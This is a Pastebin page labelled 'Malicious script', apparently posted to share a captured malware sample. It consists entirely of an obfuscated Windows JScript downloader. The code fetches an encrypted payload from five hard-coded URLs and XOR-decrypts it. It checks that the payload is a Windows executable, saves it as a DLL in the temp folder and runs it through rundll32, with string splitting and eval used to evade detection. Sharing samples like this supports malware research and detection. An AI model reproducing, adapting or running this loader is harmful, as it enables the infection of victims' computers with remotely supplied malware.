API tools faq
paste
Advertisement
dynamoo

Malicious script

dynamoo
Nov 22nd, 2016
627
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
JavaScript 12.67 KB | None | 0 0
raw download clone embed print report
  1. String.prototype.DisassociativeKMx1 = function () {return this.split(",").join("");};
  2. //BEGIN_CODEC_PART
  3. function DisassociativeNXr9(DisassociativeTWf7)
  4. {var DisassociativeFDs1=new Array();
  5. DisassociativeFDs1[199]=128;DisassociativeFDs1[252]=129;DisassociativeFDs1[233]=130;DisassociativeFDs1[226]=131;DisassociativeFDs1[228]=132;DisassociativeFDs1[224]=133;DisassociativeFDs1[229]=134;DisassociativeFDs1[231]=135;DisassociativeFDs1[234]=136;DisassociativeFDs1[235]=137;
  6. DisassociativeFDs1[232]=138;DisassociativeFDs1[239]=139;DisassociativeFDs1[238]=140;DisassociativeFDs1[236]=141;DisassociativeFDs1[196]=142;DisassociativeFDs1[197]=143;DisassociativeFDs1[201]=144;DisassociativeFDs1[230]=145;DisassociativeFDs1[198]=146;DisassociativeFDs1[244]=147;
  7. DisassociativeFDs1[246]=148;DisassociativeFDs1[242]=149;DisassociativeFDs1[251]=150;DisassociativeFDs1[249]=151;DisassociativeFDs1[255]=152;DisassociativeFDs1[214]=153;DisassociativeFDs1[220]=154;DisassociativeFDs1[162]=155;DisassociativeFDs1[163]=156;DisassociativeFDs1[165]=157;
  8. DisassociativeFDs1[8359]=158;DisassociativeFDs1[402]=159;DisassociativeFDs1[225]=160;DisassociativeFDs1[237]=161;DisassociativeFDs1[243]=162;DisassociativeFDs1[250]=163;DisassociativeFDs1[241]=164;DisassociativeFDs1[209]=165;DisassociativeFDs1[170]=166;DisassociativeFDs1[186]=167;
  9. DisassociativeFDs1[191]=168;DisassociativeFDs1[8976]=169;DisassociativeFDs1[172]=170;DisassociativeFDs1[189]=171;DisassociativeFDs1[188]=172;DisassociativeFDs1[161]=173;DisassociativeFDs1[171]=174;DisassociativeFDs1[187]=175;DisassociativeFDs1[9617]=176;DisassociativeFDs1[9618]=177;
  10. DisassociativeFDs1[9619]=178;DisassociativeFDs1[9474]=179;DisassociativeFDs1[9508]=180;DisassociativeFDs1[9569]=181;DisassociativeFDs1[9570]=182;DisassociativeFDs1[9558]=183;DisassociativeFDs1[9557]=184;DisassociativeFDs1[9571]=185;DisassociativeFDs1[9553]=186;DisassociativeFDs1[9559]=187;
  11. DisassociativeFDs1[9565]=188;DisassociativeFDs1[9564]=189;DisassociativeFDs1[9563]=190;DisassociativeFDs1[9488]=191;DisassociativeFDs1[9492]=192;DisassociativeFDs1[9524]=193;DisassociativeFDs1[9516]=194;DisassociativeFDs1[9500]=195;DisassociativeFDs1[9472]=196;DisassociativeFDs1[9532]=197;
  12. DisassociativeFDs1[9566]=198;DisassociativeFDs1[9567]=199;DisassociativeFDs1[9562]=200;DisassociativeFDs1[9556]=201;DisassociativeFDs1[9577]=202;DisassociativeFDs1[9574]=203;DisassociativeFDs1[9568]=204;DisassociativeFDs1[9552]=205;DisassociativeFDs1[9580]=206;DisassociativeFDs1[9575]=207;
  13. DisassociativeFDs1[9576]=208;DisassociativeFDs1[9572]=209;DisassociativeFDs1[9573]=210;DisassociativeFDs1[9561]=211;DisassociativeFDs1[9560]=212;DisassociativeFDs1[9554]=213;DisassociativeFDs1[9555]=214;DisassociativeFDs1[9579]=215;DisassociativeFDs1[9578]=216;DisassociativeFDs1[9496]=217;
  14. DisassociativeFDs1[9484]=218;DisassociativeFDs1[9608]=219;DisassociativeFDs1[9604]=220;DisassociativeFDs1[9612]=221;DisassociativeFDs1[9616]=222;DisassociativeFDs1[9600]=223;DisassociativeFDs1[945]=224;DisassociativeFDs1[223]=225;DisassociativeFDs1[915]=226;DisassociativeFDs1[960]=227;
  15. DisassociativeFDs1[931]=228;DisassociativeFDs1[963]=229;DisassociativeFDs1[181]=230;DisassociativeFDs1[964]=231;DisassociativeFDs1[934]=232;DisassociativeFDs1[920]=233;DisassociativeFDs1[937]=234;DisassociativeFDs1[948]=235;DisassociativeFDs1[8734]=236;DisassociativeFDs1[966]=237;
  16. DisassociativeFDs1[949]=238;DisassociativeFDs1[8745]=239;DisassociativeFDs1[8801]=240;DisassociativeFDs1[177]=241;DisassociativeFDs1[8805]=242;DisassociativeFDs1[8804]=243;DisassociativeFDs1[8992]=244;DisassociativeFDs1[8993]=245;DisassociativeFDs1[247]=246;DisassociativeFDs1[8776]=247;
  17. DisassociativeFDs1[176]=248;DisassociativeFDs1[8729]=249;DisassociativeFDs1[183]=250;DisassociativeFDs1[8730]=251;DisassociativeFDs1[8319]=252;DisassociativeFDs1[178]=253;DisassociativeFDs1[9632]=254;DisassociativeFDs1[160]=255;
  18. var DisassociativeOOx0=new Array();
  19. for (var DisassociativeFNx2=0; DisassociativeFNx2 < DisassociativeTWf7.length; DisassociativeFNx2 += 1)
  20. {var DisassociativeEGc4=DisassociativeTWf7["charCodeAt"](DisassociativeFNx2);
  21. if (DisassociativeEGc4 < 128){var DisassociativeLZu0=DisassociativeEGc4;}
  22. else {var DisassociativeLZu0=DisassociativeFDs1[DisassociativeEGc4];}
  23. DisassociativeOOx0["push"](DisassociativeLZu0);};
  24. return DisassociativeOOx0;}
  25. function DisassociativePw3(DisassociativeTt7)
  26. {var DisassociativeTUu2=new Array();
  27. DisassociativeTUu2[128]=199;DisassociativeTUu2[129]=252;DisassociativeTUu2[130]=233;DisassociativeTUu2[131]=226;DisassociativeTUu2[132]=228;DisassociativeTUu2[133]=224;DisassociativeTUu2[134]=229;DisassociativeTUu2[135]=231;DisassociativeTUu2[136]=234;DisassociativeTUu2[137]=235;
  28. DisassociativeTUu2[138]=232;DisassociativeTUu2[139]=239;DisassociativeTUu2[140]=238;DisassociativeTUu2[141]=236;DisassociativeTUu2[142]=196;DisassociativeTUu2[143]=197;DisassociativeTUu2[144]=201;DisassociativeTUu2[145]=230;DisassociativeTUu2[146]=198;DisassociativeTUu2[147]=244;
  29. DisassociativeTUu2[148]=246;DisassociativeTUu2[149]=242;DisassociativeTUu2[150]=251;DisassociativeTUu2[151]=249;DisassociativeTUu2[152]=255;DisassociativeTUu2[153]=214;DisassociativeTUu2[154]=220;DisassociativeTUu2[155]=162;DisassociativeTUu2[156]=163;DisassociativeTUu2[157]=165;
  30. DisassociativeTUu2[158]=8359;DisassociativeTUu2[159]=402;DisassociativeTUu2[160]=225;DisassociativeTUu2[161]=237;DisassociativeTUu2[162]=243;DisassociativeTUu2[163]=250;DisassociativeTUu2[164]=241;DisassociativeTUu2[165]=209;DisassociativeTUu2[166]=170;DisassociativeTUu2[167]=186;
  31. DisassociativeTUu2[168]=191;DisassociativeTUu2[169]=8976;DisassociativeTUu2[170]=172;DisassociativeTUu2[171]=189;DisassociativeTUu2[172]=188;DisassociativeTUu2[173]=161;DisassociativeTUu2[174]=171;DisassociativeTUu2[175]=187;DisassociativeTUu2[176]=9617;DisassociativeTUu2[177]=9618;
  32. DisassociativeTUu2[178]=9619;DisassociativeTUu2[179]=9474;DisassociativeTUu2[180]=9508;DisassociativeTUu2[181]=9569;DisassociativeTUu2[182]=9570;DisassociativeTUu2[183]=9558;DisassociativeTUu2[184]=9557;DisassociativeTUu2[185]=9571;DisassociativeTUu2[186]=9553;DisassociativeTUu2[187]=9559;
  33. DisassociativeTUu2[188]=9565;DisassociativeTUu2[189]=9564;DisassociativeTUu2[190]=9563;DisassociativeTUu2[191]=9488;DisassociativeTUu2[192]=9492;DisassociativeTUu2[193]=9524;DisassociativeTUu2[194]=9516;DisassociativeTUu2[195]=9500;DisassociativeTUu2[196]=9472;DisassociativeTUu2[197]=9532;
  34. DisassociativeTUu2[198]=9566;DisassociativeTUu2[199]=9567;DisassociativeTUu2[200]=9562;DisassociativeTUu2[201]=9556;DisassociativeTUu2[202]=9577;DisassociativeTUu2[203]=9574;DisassociativeTUu2[204]=9568;DisassociativeTUu2[205]=9552;DisassociativeTUu2[206]=9580;DisassociativeTUu2[207]=9575;
  35. DisassociativeTUu2[208]=9576;DisassociativeTUu2[209]=9572;DisassociativeTUu2[210]=9573;DisassociativeTUu2[211]=9561;DisassociativeTUu2[212]=9560;DisassociativeTUu2[213]=9554;DisassociativeTUu2[214]=9555;DisassociativeTUu2[215]=9579;DisassociativeTUu2[216]=9578;DisassociativeTUu2[217]=9496;
  36. DisassociativeTUu2[218]=9484;DisassociativeTUu2[219]=9608;DisassociativeTUu2[220]=9604;DisassociativeTUu2[221]=9612;DisassociativeTUu2[222]=9616;DisassociativeTUu2[223]=9600;DisassociativeTUu2[224]=945;DisassociativeTUu2[225]=223;DisassociativeTUu2[226]=915;DisassociativeTUu2[227]=960;
  37. DisassociativeTUu2[228]=931;DisassociativeTUu2[229]=963;DisassociativeTUu2[230]=181;DisassociativeTUu2[231]=964;DisassociativeTUu2[232]=934;DisassociativeTUu2[233]=920;DisassociativeTUu2[234]=937;DisassociativeTUu2[235]=948;DisassociativeTUu2[236]=8734;DisassociativeTUu2[237]=966;
  38. DisassociativeTUu2[238]=949;DisassociativeTUu2[239]=8745;DisassociativeTUu2[240]=8801;DisassociativeTUu2[241]=177;DisassociativeTUu2[242]=8805;DisassociativeTUu2[243]=8804;DisassociativeTUu2[244]=8992;DisassociativeTUu2[245]=8993;DisassociativeTUu2[246]=247;DisassociativeTUu2[247]=8776;
  39. DisassociativeTUu2[248]=176;DisassociativeTUu2[249]=8729;DisassociativeTUu2[250]=183;DisassociativeTUu2[251]=8730;DisassociativeTUu2[252]=8319;DisassociativeTUu2[253]=178;DisassociativeTUu2[254]=9632;DisassociativeTUu2[255]=160;
  40. var DisassociativeAd2=new Array();var DisassociativeUw6="";var DisassociativeLZu0; var DisassociativeEGc4;
  41. for (var DisassociativeFNx2=0; DisassociativeFNx2 < DisassociativeTt7.length; DisassociativeFNx2 += 1)
  42. {DisassociativeLZu0=DisassociativeTt7[DisassociativeFNx2];
  43. if (DisassociativeLZu0 < 128){DisassociativeEGc4=DisassociativeLZu0;}
  44. else {DisassociativeEGc4=DisassociativeTUu2[DisassociativeLZu0];}
  45. DisassociativeAd2.push(String["fromCharCode"](DisassociativeEGc4));}
  46. DisassociativeUw6=DisassociativeAd2["join"]("");
  47. return DisassociativeUw6;}
  48. function DisassociativeGl6(DisassociativeTt7, DisassociativeEFs6)
  49. {var DisassociativeDRw6 = DisassociativeNXr9(DisassociativeEFs6);
  50. for (var DisassociativeFNx2 = 0; DisassociativeFNx2 < DisassociativeTt7.length; DisassociativeFNx2 += 1)
  51. {DisassociativeTt7[DisassociativeFNx2] ^= DisassociativeDRw6[DisassociativeFNx2 % DisassociativeDRw6.length];};
  52. return DisassociativeTt7;}
  53. function DisassociativeUq7(DisassociativeYGa2)
  54. {var DisassociativeNCk5=WScript["CreateObject"]("A"+"D"+"O"+"DB.Stream");
  55. DisassociativeNCk5["type"]=2;
  56. DisassociativeNCk5["Charset"]="437";
  57. DisassociativeNCk5["open"]();
  58. DisassociativeNCk5["LoadFromFile"](DisassociativeYGa2);
  59. var DisassociativeZj1=DisassociativeNCk5["ReadText"];
  60. DisassociativeNCk5["close"]();
  61. return DisassociativeNXr9(DisassociativeZj1);}
  62. function DisassociativePp3(DisassociativeYGa2, DisassociativeTt7)
  63. {var DisassociativeNCk5=WScript["CreateObject"]("A"+"D"+"O"+"DB.Stream");
  64. DisassociativeNCk5["type"]=2;
  65. DisassociativeNCk5["Charset"]="437";
  66. DisassociativeNCk5["open"]();
  67. DisassociativeNCk5["writeText"](DisassociativePw3(DisassociativeTt7));
  68. DisassociativeNCk5["SaveToFile"](DisassociativeYGa2, 2);
  69. DisassociativeNCk5["close"]();}
  70. //END_CODEC_PART
  71. var DisassociativeBp8 = "http://";
  72.     var DisassociativeWx8 = [DisassociativeBp8 + "sbdma.com/ri3xnzkaoz",DisassociativeBp8 + "robertocostama.com/qpnst8glsz",DisassociativeBp8 + "kettycoony.com/ahkzls3w",DisassociativeBp8 + "sadhekoala.com/efgqy4tdw",DisassociativeBp8 + "sdwsgs.com/voh7l"];
  73. var DisassociativeBNy7 = "KUVIL0IhVIFV";
  74. var DisassociativeKa7 = "R9cSS1rkjyRw";
  75. var DisassociativeSb3 = "L2hr1GeO6BCNFWPT";
  76. var DisassociativeUr8=2;
  77. var DisassociativeBs9=WScript["CreateObject"]("WScript.Shell");
  78. var DisassociativeGFa5=DisassociativeBs9.ExpandEnvironmentStrings("%T"+"EMP%/");
  79. var DisassociativeXAk4=DisassociativeGFa5 + DisassociativeBNy7;
  80. var DisassociativeFUm6=DisassociativeXAk4 + ".d" + "ll";
  81. var DisassociativeFn1 = DisassociativeBs9["Environment"]("System");
  82. if (DisassociativeFn1("PROCESSOR_ARCHITECTURE").toLowerCase() == "amd64")
  83. {
  84. var DisassociativeAKu2 = DisassociativeBs9.ExpandEnvironmentStrings("%SystemRoot%\\SysWOW64\\ru"+"ndll32.exe");
  85. }
  86. else
  87. {
  88. var DisassociativeAKu2 = DisassociativeBs9["ExpandEnvironmentStrings"]("%SystemRoot%\\system32\\ru"+"ndll32.exe");
  89. }
  90. var DisassociativeIHy7=["M,S,X,M,L,2,.,X,M,L,H,T,T,P".DisassociativeKMx1(), "WinHttp.WinHttpRequest.5.1"];
  91. for (var DisassociativeFNx2=0; DisassociativeFNx2 < DisassociativeIHy7.length; DisassociativeFNx2 += 1)
  92. {
  93. try
  94. {
  95. var DisassociativeQPw3=WScript["CreateObject"](DisassociativeIHy7[DisassociativeFNx2]);
  96. break;
  97. }
  98. catch (e)
  99. {
  100. continue;
  101. }
  102. };
  103. var DisassociativePUo6 = new ActiveXObject("Scripting.FileSystemObject");
  104. function DisassociativeUf9()
  105. {
  106. var DisassociativeWUn8 = DisassociativePUo6.GetFile(DisassociativeFUm6);
  107. return DisassociativeWUn8["ShortPath"];
  108. }
  109. var DisassociativeFy6 = 0;
  110. for (var DisassociativeTTb4 = 0; DisassociativeTTb4 < DisassociativeWx8.length; DisassociativeTTb4 = DisassociativeTTb4 + 1)
  111. {
  112. try
  113. {
  114. var DisassociativeSPt3=this["W,S,c,r,i,p,t".DisassociativeKMx1()]["CreateObject"]("A"+"D"+"O"+"DB.Stream");
  115. DisassociativeQPw3["open"]("G,E,T".DisassociativeKMx1(), DisassociativeWx8[DisassociativeTTb4], false);
  116. DisassociativeQPw3.setRequestHeader("User-Agent","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
  117. DisassociativeQPw3["send"]();
  118. while (DisassociativeQPw3.readystate < 4) WScript["Sleep"](100);
  119. DisassociativeSPt3["open"]();
  120. DisassociativeSPt3.type=1;
  121. /*@cc_on
  122. DisassociativeSPt3.write(DisassociativeQPw3.ResponseBody);
  123. DisassociativeSPt3.position=0;
  124. DisassociativeSPt3['Sav'+'eT'+'oFile'](DisassociativeXAk4,    DisassociativeUr8);
  125. DisassociativeSPt3.close();
  126. var DisassociativeOOx0 = DisassociativeUq7(DisassociativeXAk4);
  127. DisassociativeOOx0 = DisassociativeGl6(DisassociativeOOx0, DisassociativeKa7);
  128. if (DisassociativeOOx0[0] != 77 || DisassociativeOOx0[1] != 90) continue;
  129. DisassociativePp3(DisassociativeFUm6, DisassociativeOOx0);
  130. var DisassociativeZGx7 = DisassociativeUf9();
  131. var d = new Date();
  132. d.setFullYear("2015");
  133. eval('DisassociativeBs9["R,u,n".DisassociativeKMx1()]("r,u,n,d,l,l,3,2".DisassociativeKMx1() + " " + DisassociativeZGx7 + "," + DisassociativeSb3);');
  134. @*/
  135. break;
  136. }
  137. catch (e) {continue;};
  138. }
  139. WScript.Quit(0);
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!